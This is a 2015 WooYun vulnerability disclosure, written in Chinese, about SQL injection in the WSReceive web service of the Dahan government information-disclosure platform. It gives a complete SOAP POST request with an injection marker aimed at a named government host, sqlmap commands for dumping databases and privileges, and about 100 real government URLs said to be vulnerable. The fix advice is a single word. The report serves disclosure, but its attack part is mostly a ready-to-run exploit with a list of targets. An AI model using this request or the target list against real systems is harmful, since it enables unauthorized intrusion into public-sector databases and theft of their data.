当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102002

漏洞标题:大汉政府信息公开多处SQL注入二(附100个案例)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-03-18 06:51

修复时间:2015-06-21 06:53

公开时间:2015-06-21 06:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-17: 细节向核心白帽子及相关领域专家公开
2015-05-27: 细节向普通白帽子公开
2015-06-06: 细节向实习白帽子公开
2015-06-21: 细节向公众公开

简要描述:

大汉政府信息公开多处SQL注入二(附100个案例)

详细说明:

依然是webservice漏洞,漏洞存在于
/xxgk/services/WSReceive?wsdl
该WSReceive服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在。
wsGetWeb
getClientIpAxis
wsGetColumn
wsGetColumnStyle
wsGetColumnTotalNumber
wsGetColumnTotalNumberExtend
wsGetInfosBase64
wsGetInfos
wsGetInfosExtend
wsGetInfosExtendBase64
wsGetInfosByIdsBase64
wsGetInfosByIds
wsGetCountByColumn
wsGetSubInfos
wsGetAllInfosBase64
wsGetAllInfos
wsGetAllInfosByIdsBase64
wsGetAllInfosByIds
wsSyncGetInfos
wsSyncGetInfos
wsGetSyncColumns
wsSyncSuccessed
wsSyncDelete
wsGetSubCatalogs
上述方法的多个参数均存在漏洞,随便选取一个方法进行测试
/xxgk/services/WSReceive?wsdl wsGetAllInfos方法
(/xxgk/services/WSReceive?wsdl || /gov/services/WSReceive?wsdl)
用WSockExpert v0.7抓包,并保存为wooyun.txt

POST /xxgk/services/WSReceive?wsdl HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 222
Host: xxgk.lyg.gov.cn
Connection: Keep-Alive
User-Agent: google robots
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.blf.jcms">
<soapenv:Header/>
<soapenv:Body>
<web:wsGetAllInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<nCataId xsi:type="xsd:int">1</nCataId>
<bLink xsi:type="xsd:int">2</bLink>
<nStart xsi:type="xsd:int">3</nStart>
<nEnd xsi:type="xsd:int">4</nEnd>
<strLoginId xsi:type="xsd:string">5*</strLoginId>
<strPwd xsi:type="xsd:string">6</strPwd>
<strKey xsi:type="xsd:string">7</strKey>
</web:wsGetAllInfos>
</soapenv:Body>
</soapenv:Envelope>


该漏洞可以直接用SQLMAP跑出的数据
sqlmap.py -r wooyun.txt
www.gs.gov.cn

1.jpg


sqlmap.py -r wooyun.txt --current-db --privilege

2.jpg


xxgk.lyg.gov.cn
sqlmap.py -r wooyun.txt

11.jpg


sqlmap.py -r wooyun.txt --current-db --dbs

22.jpg


由于该漏洞普遍存在,为证明漏洞的危害,列举100个案例:
http://xxgk.zjds.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.taixing.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.jining.gov.cn/xxgk/services/WSReceive?wsdl
http://www.xxgk.lg.gov.cn/xxgk/services/WSReceive?wsdl
http://www.jinhua.gov.cn/xxgk/services/WSReceive?wsdl
http://gongkai.sd-n-tax.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.wenzhou.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.jsgs.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.nbjiangbei.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.sdxm.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.changde.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.gygov.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.longwan.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.cqyc.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.gaomi.gov.cn:82/xxgk/services/WSReceive?wsdl
http://www.huzhou.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.zaozhuang.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.lucheng.gov.cn/xxgk/services/WSReceive?wsdl
http://zfxxgk.weihai.gov.cn/xxgk/services/WSReceive?wsdl
http://218.94.123.47/xxgk/services/WSReceive?wsdl
http://xxgk.yiyuan.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.zhucheng.gov.cn/xxgk/services/WSReceive?wsdl
http://www.nanxun.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.xiaogan.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.zibo.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.lyg.gov.cn/xxgk/services/WSReceive?wsdl
http://211.138.126.163/xxgk/services/WSReceive?wsdl
http://xxgk.wencheng.gov.cn/xxgk/services/WSReceive?wsdl
http://zfxxgk.liaocheng.gov.cn/xxgk/services/WSReceive?wsdl
http://www.jsforestry.gov.cn/xxgk/services/WSReceive?wsdl
http://60.190.68.201:7001/xxgk/services/WSReceive?wsdl
http://xxgk.shizhong.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.gzlps.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.jingning.gov.cn/xxgk/services/WSReceive?wsdl
http://blxxgk.bl.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.qingzhou.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.panxian.gov.cn/xxgk/services/WSReceive?wsdl
http://www.dongtai.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.shanghe.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.cncn.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.gzwd.gov.cn/xxgk/services/WSReceive?wsdl
http://www.hzgjj.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.siyang.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.zjwy.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.tianqiao.gov.cn/xxgk/services/WSReceive?wsdl
http://218.2.208.145/xxgk/services/WSReceive?wsdl
http://xxgk.jc.gansu.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.wzrc.net/xxgk/services/WSReceive?wsdl
http://xxgk.hbjs.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.jiangyan.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.jingjiang.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.changle.gov.cn:82/xxgk/services/WSReceive?wsdl
http://xxgk.szzj.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.stats-sd.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.hg.gov.cn/xxgk/services/WSReceive?wsdl
http://www.zjdlr.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.yj.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.yqjq.gov.cn/xxgk/services/WSReceive?wsdl
http://zfxxgk.heze.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk3.nantong.gov.cn/xxgk/services/WSReceive?wsdl
http://www.jsgl.cn/xxgk/services/WSReceive?wsdl
http://www.zjch.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.yidu.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.jsmuseum.com/xxgk/services/WSReceive?wsdl
http://www.77778.com/xxgk/services/WSReceive?wsdl
http://xxgk.pingyin.gov.cn/xxgk/services/WSReceive?wsdl
http://www.jshb.net/xxgk/services/WSReceive?wsdl
http://zfxxgk.seac.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.tx.gov.cn/xxgk/services/WSReceive?wsdl
http://www.dejiang.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.yq.gov.cn/xxgk/services/WSReceive?wsdl
http://www.ec.js.edu.cn/xxgk/services/WSReceive?wsdl
http://www.njzj.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.zjpy.gov.cn/xxgk/services/WSReceive?wsdl
http://www.gaoqing.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.czzl.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.liuzhi.gov.cn/xxgk/services/WSReceive?wsdl
http://xxgk.sx.gov.cn/xxgk_public/services/WSReceive?wsdl
http://xxgk.10.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.ycxl.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.changyang.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.haiyan.gov.cn/gov/services/WSReceive?wsdl
http://open.jiashan.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.yichang.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.dyq.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.xingshan.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.kuiwen.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.hbwf.gov.cn/gov/services/WSReceive?wsdl
http://www.wuxing.gov.cn/gov/services/WSReceive?wsdl
http://61.159.149.203:9080/gov/services/WSReceive?wsdl
http://xxgk.dianjun.gov.cn/gov/services/WSReceive?wsdl
http://211.138.126.163:7003/gov/services/WSReceive?wsdl
http://xxgk.zrt.gov.cn/gov/services/WSReceive?wsdl
http://220.191.221.136/gov/services/WSReceive?wsdl
http://119.191.58.141/gov/services/WSReceive?wsdl
http://zfxxgk.dongying.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.hbdy.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.yuanan.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.lijin.gov.cn/gov/services/WSReceive?wsdl
http://xxgk.sdfda.gov.cn/gov/services/WSReceive?wsdl

漏洞证明:

SQLMAP直接跑出数据:

22.jpg

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-21 06:53

厂商回复:

最新状态:

暂无